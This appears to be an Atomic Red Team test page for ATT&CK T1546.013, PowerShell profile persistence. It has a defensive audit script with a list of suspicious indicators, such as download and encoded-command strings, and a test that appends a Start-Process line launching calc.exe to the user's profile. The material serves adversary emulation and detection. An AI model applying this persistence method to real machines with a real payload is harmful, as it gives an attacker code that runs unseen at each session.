
T1546.013 - Event Triggered Execution: PowerShell Profile

Description from ATT&CK

Adversaries may gain persistence and elevate privileges by executing malicious content triggered by PowerShell profiles. A PowerShell profile (profile.ps1) is a script that runs when PowerShell starts and can be used as a logon script to customize user environments.

PowerShell supports several profiles depending on the user or host program. For example, there can be different profiles for PowerShell host programs such as the PowerShell console, PowerShell ISE or Visual Studio Code. An administrator can also configure a profile that applies to all users and host programs on the local computer. (Citation: Microsoft About Profiles)

Adversaries may modify these profiles to include arbitrary commands, functions, modules, and/or PowerShell drives to gain persistence. Every time a user opens a PowerShell session the modified script will be executed unless the -NoProfile flag is used when it is launched. (Citation: ESET Turla PowerShell May 2019)

An adversary may also be able to escalate privileges if a script in a PowerShell profile is loaded and executed by an account with higher privileges, such as a domain administrator. (Citation: Wits End and Shady PowerShell Profiles)
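The description above lists several profile locations, so a defender's check has to look at all of them, not just $profile. The following audit script is an added example (not part of the Atomic Red Team test or the ATT&CK text): it enumerates the four paths exposed as properties of the automatic $PROFILE variable and flags lines matching a constructed indicator list, which is an assumption for illustration rather than a complete detection rule.

```powershell
# Added example: audit every PowerShell profile path visible to this host and user.
# The $PROFILE properties below are documented PowerShell behaviour; the indicator
# list is a constructed, illustrative set of strings, not an exhaustive rule.
function Get-ProfileIndicators {
    $indicators = @(
        'Start-Process', 'Invoke-Expression', 'DownloadString', 'DownloadFile',
        'EncodedCommand', 'FromBase64String', 'Net.WebClient', 'Invoke-WebRequest',
        'rundll32', 'regsvr32', 'mshta'
    )

    $profilePaths = @(
        $PROFILE.AllUsersAllHosts,
        $PROFILE.AllUsersCurrentHost,
        $PROFILE.CurrentUserAllHosts,
        $PROFILE.CurrentUserCurrentHost
    )

    foreach ($path in $profilePaths) {
        if (-not (Test-Path -LiteralPath $path)) {
            # Report absent profiles too, so a newly created one stands out against a baseline.
            [pscustomobject]@{ Path = $path; Exists = $false; Modified = $null; Sha256 = $null; Line = $null; Indicator = $null; Text = $null }
            continue
        }
        $item = Get-Item -LiteralPath $path
        $hash = (Get-FileHash -LiteralPath $path -Algorithm SHA256).Hash
        $lineNo = 0
        $hits = 0
        foreach ($line in Get-Content -LiteralPath $path) {
            $lineNo++
            foreach ($ind in $indicators) {
                if ($line -match [regex]::Escape($ind)) {
                    $hits++
                    [pscustomobject]@{ Path = $path; Exists = $true; Modified = $item.LastWriteTime; Sha256 = $hash; Line = $lineNo; Indicator = $ind; Text = $line.Trim() }
                    break   # one record per line is enough for triage
                }
            }
        }
        if ($hits -eq 0) {
            # Emit the hash and timestamp even for clean files so they can be baselined.
            [pscustomobject]@{ Path = $path; Exists = $true; Modified = $item.LastWriteTime; Sha256 = $hash; Line = $null; Indicator = $null; Text = $null }
        }
    }
}

Get-ProfileIndicators | Format-Table -AutoSize
```

The CurrentHost paths differ per host program, so run this from each host in use (console, ISE, VS Code), and from an elevated session so the AllUsers paths are readable.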

Atomic Tests


Atomic Test #1 - Append malicious start-process cmdlet

Appends a Start-Process cmdlet to the current user's PowerShell profile that points to a malicious executable. Upon execution, calc.exe will be launched.

Supported Platforms: Windows

auto_generated_guid: 090e5aa5-32b6-473b-a49b-21e843a56896

Inputs:

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| exe_path | Path to the malicious executable | path | calc.exe |
| ps_profile | PowerShell profile to use | string | $profile |

Attack Commands: Run with powershell!

Add-Content #{ps_profile} -Value ""
Add-Content #{ps_profile} -Value "Start-Process #{exe_path}"
powershell -Command exit

Cleanup Commands:

# Strip the appended Start-Process line from the same profile the test modified (#{ps_profile}, not a hard-coded $profile)
$oldprofile = Get-Content #{ps_profile} | Select-Object -SkipLast 1
Set-Content #{ps_profile} -Value $oldprofile

Dependencies: Run with powershell!

Description: Ensure a PowerShell profile exists for the current user
Check Prereq Commands:
if (Test-Path #{ps_profile}) {exit 0} else {exit 1}
Get Prereq Commands:
New-Item -Path #{ps_profile} -Type File -Force